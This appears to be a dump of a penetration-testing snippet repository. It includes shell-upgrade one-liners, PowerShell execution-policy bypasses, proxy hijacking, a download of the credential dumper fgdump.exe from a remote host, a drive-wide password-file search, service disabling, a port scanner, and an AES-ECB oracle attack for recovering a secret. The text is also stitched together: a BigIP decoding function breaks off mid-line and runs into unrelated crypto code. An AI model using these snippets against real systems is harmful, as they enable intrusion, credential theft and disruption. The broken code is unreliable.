* https://support.portswigger.net/customer/portal/articles/1841102-installing-burp-s-ca-certificate-in-an-android-device
* http://www.gottabemobile.com/2013/11/10/enable-developer-options-nexus-5-kitkat/
-------------------------------------------------------------------------------- /snippets/bash/README.md: --------------------------------------------------------------------------------
## Bash snippets
### Improve limited shell
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
```
-------------------------------------------------------------------------------- /snippets/powershell/README.md: --------------------------------------------------------------------------------
## PowerShell snippets
### Execution Bypass
```powershell
Set-ExecutionPolicy Bypass -Scope Process
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
powershell -ExecutionPolicy ByPass -File script.ps1
```

### Change proxy
```powershell
#Change this to whatever proxy you want to use
$newProxy = "http://localhost:8080"

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"

Set-ItemProperty -Path $path -Name "MigrateProxy" -Value 00000001
Set-ItemProperty -Path $path -Name "ProxyEnable" -Value 00000001
Set-ItemProperty -Path $path -Name "ProxyHttp1.1" -Value 00000000
Set-ItemProperty -Path $path -Name "ProxyServer" -Value $newProxy
Set-ItemProperty -Path $path -Name "ProxyOverride" -Value ""

#Hex array with several configurations, but just want to change the 9th value
$a = (Get-ItemProperty -Path ($path+"Connections\") -Name DefaultConnectionSettings).DefaultConnectionSettings
$a[8] = 3
$a[8] = 29 #to revert

Set-ItemProperty -Path ($path+"Connections\") -Name DefaultConnectionSettings -Value $a
```

### Download file
```powershell
$url = "http://192.168.0.200"
$client = new-object System.Net.WebClient
$client.DownloadFile(($url+"/fgdump.exe"), "fgdump.exe")
```
### Search for files with "pass"
```powershell
$ErrorActionPreference = "SilentlyContinue"

Get-PSDrive -PSProvider 'FileSystem' | ForEach-Object {
    $directory = $_
    Write-Output "Looking for files in $($directory.Root) ($($directory.Description))"

    # Searching files that contain the string "pass"
    Get-ChildItem $directory.Root -Recurse | Where-Object { !$_.PSIsContainer } | ForEach-Object { Select-String -path $_.FullName -pattern "password" -SimpleMatch -List } | ForEach-Object { $_.path }

    # Searching for files or directories with "pass" in the filename
    Get-ChildItem $directory.Root -Recurse -Include "*pass*" | ForEach-Object {$_.FullName} # Used to find files with password in the filename
}

@("\\some.ip.add.ress\network_share$") | ForEach-Object {
    Write-Output "Looking for files in $($_) "

    # Searching files that contain the string "pass"
    Get-ChildItem $_ -Recurse | Where-Object { !$_.PSIsContainer } | ForEach-Object { Select-String -path $_.FullName -pattern "password" -SimpleMatch -List } | ForEach-Object { $_.path }

    # Searching for files or directories with "pass" in the filename
    Get-ChildItem $_ -Recurse -Include "*pass*" | ForEach-Object {$_.FullName} # Used to find files with password in the filename
}
```

### Mess with services/processes
```powershell
Get-Service -name "m*" | Set-Service -StartupType "disabled"

Stop-Process -force -name name*,any*,etc

```

### Port scan
```powershell
$ErrorActionPreference = "SilentlyContinue" # careful with this
$ports = 1..10000
$ip = "10.1.1.1"

foreach ($port in $ports) {
    if(Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip) {
        $socket = new-object System.Net.Sockets.TcpClient($ip, $port)
        If($socket.Connected) {
            "$ip listening to port $port"
            $socket.Close()
        }
    }
}
```

```powershell
# single port check; $ip and $port are set so the message below has values to print
$ip = "10.1.1.1"
$port = 445
$socket = new-object System.Net.Sockets.TcpClient($ip, $port)
If($socket.Connected) {
    "$ip listening to port $port"
    $socket.Close()
}
```
-------------------------------------------------------------------------------- /snippets/python/README.md:
--------------------------------------------------------------------------------
## Python snippets

### TCP client
```python
import socket
host = 'google.com'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(b"GET / HTTP/1.1\r\nHost:google.com\r\n\r\n")
response = s.recv(4096)
print(response)
```

### TCP server
```python
import socket
import threading
bind_ip = '0.0.0.0'
bind_port = 4445


def handler(client_socket):
    client_request = client_socket.recv(1024)
    print('Received {}'.format(client_request))
    client_socket.sendall(b'ACK\n')
    client_socket.close()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))

server.listen(5)  # max backlog of connections

while True:
    client_socket, (ip, port) = server.accept()
    print("Received connection from {}:{}".format(ip, port))
    thread = threading.Thread(target=handler, args=(client_socket,))
    thread.start()
```

### BigIP decoding and encoding
```python
import struct
import sys

def decode(ip_int):
    print("[*] Decoding {}".format(ip_int))
    host, port, end = str(ip_int).split('.')
    a, b, c, d = list(i for i in struct.pack("I", big_int)

# Imports needed by the helper functions below (assumed: the original import
# lines are not visible in this copy of the file)
from math import ceil
import itertools
import string
from Crypto.Cipher import AES
from Crypto import Random
from Crypto.Util import Counter

def raw_to_int(raw):
    return int.from_bytes(raw, byteorder='big')

def ascii_to_raw(ascii_string):
    # If ascii_string is a list it will be joined until it is no longer, e.g.
    # a list of lists of strings will correctly be converted into a string USEFUL IN CHALLENGE 6
    while isinstance(ascii_string, list):
        ascii_string = ''.join([element for element in ascii_string])
    if isinstance(ascii_string, bytes):
        return ascii_string
    return bytes(ascii_string, 'utf-8')

def list_of_int_to_bytes(list_of_ints):
    return bytes(list_of_ints)  # more of a reminder than an actual useful method

def fixed_xor(msg, key):
    msg, key = list(msg), list(key)
    if len(msg) != len(key):
        raise ValueError("Msg and key lengths do not match. msg {}, key {}".format(len(msg), len(key)))
    return bytes([msg[i] ^ key[i] for i in range(len(msg))])

def repeating_char_xor(msg, key_char):
    return fixed_xor(msg, [key_char for _ in range(len(msg))])

def repeating_key_xor(msg, key):
    key = (ceil(len(msg)/len(key))*key)[:len(msg)]
    return fixed_xor(msg, key)

def score_plaintext(plaintext, strict=False):
    ETAOIN = 'etaoinshrdlcumwfgypbvkjxqzETAOINSHRDLCUMWFGYPBVKJXQZ 1234567890!"\'#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n\r'
    counter = 0
    for letter in plaintext:
        if letter.upper() in ETAOIN:
            counter += len(ETAOIN) - ETAOIN.index(letter.upper())
        else:
            counter -= len(ETAOIN)  # to punish plain texts with non printable chars
    return counter/len(plaintext)

def single_char_xor_bruteforce(ciphertext):
    # try every single-byte key (0..255) and keep the one with the best English score
    l = {key: score_plaintext(raw_to_ascii(repeating_char_xor(ciphertext, key))) for key in range(256)}
    return sorted(l.items(), key=lambda x: x[1], reverse=True)[0][0]

def hamming_dist(raw1, raw2):
    return sum([bin(l).count('1') for l in fixed_xor(raw1, raw2)])

def break_raw_into_chunks(raw, chunksize):
    return [raw[i:i+chunksize] for i in range(0, len(raw), chunksize)]

def transpose_blocks(blocks):
    # Gets the nth element of every block and creates a new block with them, e.g.
    # transpose_blocks([[1,2,3],[1,2,3],[1,2,3]]) == [[1,1,1],[2,2,2],[3,3,3]]
    return [block for block in itertools.zip_longest(*blocks, fillvalue=0)]

def discover_block_size(oracle):
    initial_len = len(oracle(''))
    for i in range(100):
        new_len = len(oracle('A'*i))
        if new_len - initial_len > 0:
            return new_len - initial_len

# Below AES methods with PKCS#7 padding scheme

def pad_with_pkcs7(msg, block_size=16):
    msg = ascii_to_raw(msg)
    padding = block_size - (len(msg) % block_size)
    msg = msg + bytes(chr(padding) * padding, 'ascii')
    return msg

def unpad_with_pkcs7(padded_plaintext):
    padded_plaintext = ascii_to_raw(padded_plaintext)
    last_byte = padded_plaintext[-1]
    pad = padded_plaintext[-last_byte:]
    if len(pad) != last_byte or [c for c in pad if c != last_byte]:
        raise ValueError("Bad padding. Last_byte = {}".format(hex(last_byte)))

    return padded_plaintext[:-last_byte]

def aes_ecb_encrypt(key, msg):
    msg = pad_with_pkcs7(msg)
    cipher = AES.new(key, AES.MODE_ECB)
    return cipher.encrypt(msg)

def aes_ecb_decrypt(key, cpt):
    cipher = AES.new(key, AES.MODE_ECB)
    msg = cipher.decrypt(cpt)
    return unpad_with_pkcs7(msg)

def aes_cbc_encrypt(key, msg, iv=''):
    block_size = AES.block_size  # always 16 for AES, whatever the key length
    msg = pad_with_pkcs7(msg)
    iv = iv or Random.new().read(block_size)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return iv + cipher.encrypt(msg)

def aes_cbc_decrypt(key, cpt):
    block_size = AES.block_size
    iv, cpt = cpt[:block_size], cpt[block_size:]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    msg = cipher.decrypt(cpt)
    return unpad_with_pkcs7(msg)

def detect_aes_block_cipher_mode(oracle, block_size):
    blocks = break_raw_into_chunks(oracle('A'*block_size*3), block_size)
    return 'ECB' if sum([1 for b1, b2 in list(itertools.combinations(blocks, 2)) if b1 == b2]) > 0 else 'CBC'

def aes_ecb_find_secret_appended_text(oracle, block_size):
    # finds max size of prepended text, give or take padding
    cpt = break_raw_into_chunks(oracle('A' * block_size * 20), block_size)
    max_size_of_prepended_text = 0
    for i, chunk in enumerate(cpt[:-1]):
        if chunk == cpt[i+1]:  # If True, prepended finishes between i-1 and i
            max_size_of_prepended_text = i*block_size
            break

    # brute forces the appended text one character at a time
    for i in range(0, block_size):
        padding = 'A'*i
        my_input = 'A' * (block_size * 11)
        secret_append = ''

        try:
            while my_input:
                my_input = my_input[:-1]
                d = {oracle(padding + my_input + secret_append + l)[max_size_of_prepended_text+160:max_size_of_prepended_text+176]: l for l in string.printable}
                secret_append += d[oracle(padding + my_input)[max_size_of_prepended_text+160:max_size_of_prepended_text+176]]
        except KeyError:
            if secret_append:
                return ascii_to_raw(secret_append)

def aes_ctr_encrypt(key, msg, counter):
    cipher = AES.new(key, AES.MODE_CTR, counter=counter)
    return cipher.decrypt(msg)  # CTR is symmetric: encrypt and decrypt XOR the same keystream

def aes_ctr_randomiv_encrypt(key, msg):
    nonce = int.from_bytes(Random.new().read(16), 'big')
    counter = Counter.new(8*16, initial_value=nonce)
    iv = nonce.to_bytes(16, 'big')  # always 16 bytes; hex() could yield an odd-length string
    cipher = AES.new(key, AES.MODE_CTR, counter=counter)
    return iv + cipher.decrypt(msg)

def aes_ctr_randomiv_decrypt(key, cpt):
    counter = Counter.new(8*16, initial_value=int.from_bytes(cpt[:16], 'big'))
    cipher = AES.new(key, AES.MODE_CTR, counter=counter)
    return cipher.decrypt(cpt[16:])
```
-------------------------------------------------------------------------------- /web/burpsuite_free_v1.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/web/burpsuite_free_v1.6.jar
--------------------------------------------------------------------------------
/web/clickjacking_bypass.html:
--------------------------------------------------------------------------------
(HTML markup not captured; only the section titles of the page survived)

Vulnerable application loaded within an iframe

Double framing?

onBeforeUnload

No-Content Flushing

--------------------------------------------------------------------------------
/web/clickjacking_outter_frame.html:
--------------------------------------------------------------------------------
(HTML markup not captured)
--------------------------------------------------------------------------------
/web/csrf.html:
--------------------------------------------------------------------------------
(HTML markup not captured; only the text of the page survived)

Multi-step CSRF attack.

A POST request is made for each one of the forms, with the target being NstFrame.

--------------------------------------------------------------------------------
/web/help.md:
--------------------------------------------------------------------------------
## User-Agents

* IE6
  * Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
* IE7
  * Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
* IE11
  * Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
--------------------------------------------------------------------------------